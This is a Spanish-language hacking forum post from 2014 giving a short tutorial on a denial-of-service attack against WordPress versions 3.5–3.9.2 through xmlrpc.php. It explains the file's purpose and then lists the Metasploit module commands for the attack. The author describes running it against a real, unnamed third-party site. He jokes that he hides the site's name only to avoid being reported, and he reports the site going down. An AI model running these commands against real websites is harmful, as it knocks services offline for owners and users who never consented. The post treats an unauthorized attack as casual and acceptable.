comment
IRC Chat
play_arrow
  3. DoS en Wordpress con xmlrpc.php
Este sitio utiliza cookies propias y de terceros. Si continúa navegando consideramos que acepta el uso de cookies. OK Más Información.
« anterior próximo »
Páginas: [1]   Ir Abajo

DoS en Wordpress con xmlrpc.php

  • 0 Respuestas
  • 3049 Vistas

0 Usuarios y 1 Visitante están viendo este tema.

Desconectado ZanGetsu

  • *
  • Underc0der
  • Mensajes: 325
  • Actividad:
    0%
  • Reputación 0
  • I ZanGetsu
    • Ver Perfil
  • Skype: thenicox
  • Twitter: black_zangetsu

DoS en Wordpress con xmlrpc.php

« en: Septiembre 09, 2014, 03:26:33 pm »
Que hay chicos les traigo este peque tuto

xmlrpc.php para que sirve?

Xmlrpc.php es el encargado de permitirnos postear remotamente a través de Microsoft Word, Textmate, Thunderbird, smartphones, entre otros clientes. Todo ello a través del protocolo XML-RPC.


Además será quien se encargue de recibir los pingbacks (enlaces de otros blogs hacía alguno de nuestros artículos) y enviar los trackbacks (enlaces de nuestro blog hacía artículos de otro blog).

Bueno ya la vulne de xmlrpc me la tope hace mucho tiempo (No tienes permisos para ver links. Registrate o Entra con tu cuenta)
este archivo se usa para realizar un poderoso ataque Dos, en donde el amigo metasploit ya hizo su trabajo :D

Código: No tienes permisos para ver links. Registrate o Entra con tu cuenta
msf > use auxiliary/dos/http/wordpress_xmlrpc_dos     
msf auxiliary(wordpress_xmlrpc_dos) > show actions           
...actions...
msf auxiliary(wordpress_xmlrpc_dos) > set ACTION <action-name>     
msf auxiliary(wordpress_xmlrpc_dos) > show options           
...show and set options...
msf auxiliary(wordpress_xmlrpc_dos) > run
Yo busque un website con wp versiones vulnerables: 3.5 - 3.9.2



No muestro el website para demostrar algo de etica (na mentira para que no denuncien jajaj)

Despues de completar el rhost y targeturi le damos a run



y con esto estaremos empezando el dos, el website cae a ratos, pero veamos un test
de velocidad de carga antes y despues:

Antes:



Con el dos activo:





Saludos !
« Última modificación: Junio 07, 2015, 07:46:44 pm por EPSILON »
En línea
Páginas: [1]   Ir Arriba
« anterior próximo »
 

¿Te gustó el post? COMPARTILO!



Herramienta de test de penetración para WordPress o Joomla!

Iniciado por graphixx

 Respuestas: 0
Vistas: 2127 		Último mensaje Octubre 16, 2015, 07:24:41 am
por graphixx
Brute Force en paneles de administración WordPress con WPScan

Iniciado por BrowserNet

 Respuestas: 2
Vistas: 2070 		Último mensaje Junio 01, 2016, 01:31:11 am
por BrowserNet
Como subir shell en Wordpress

Iniciado por AΞRCRΞA

 Respuestas: 1
Vistas: 3942 		Último mensaje Noviembre 13, 2013, 03:14:53 am
por alexander1712
Cómo encontrar Malware en su web de WordPress

Iniciado por morodog

 Respuestas: 0
Vistas: 1651 		Último mensaje Marzo 11, 2015, 05:27:43 am
por morodog
Securizar el acceso a wp-admin de WordPress

Iniciado por BlackDead

 Respuestas: 1
Vistas: 1640 		Último mensaje Agosto 07, 2013, 01:19:51 am
por ZanGetsu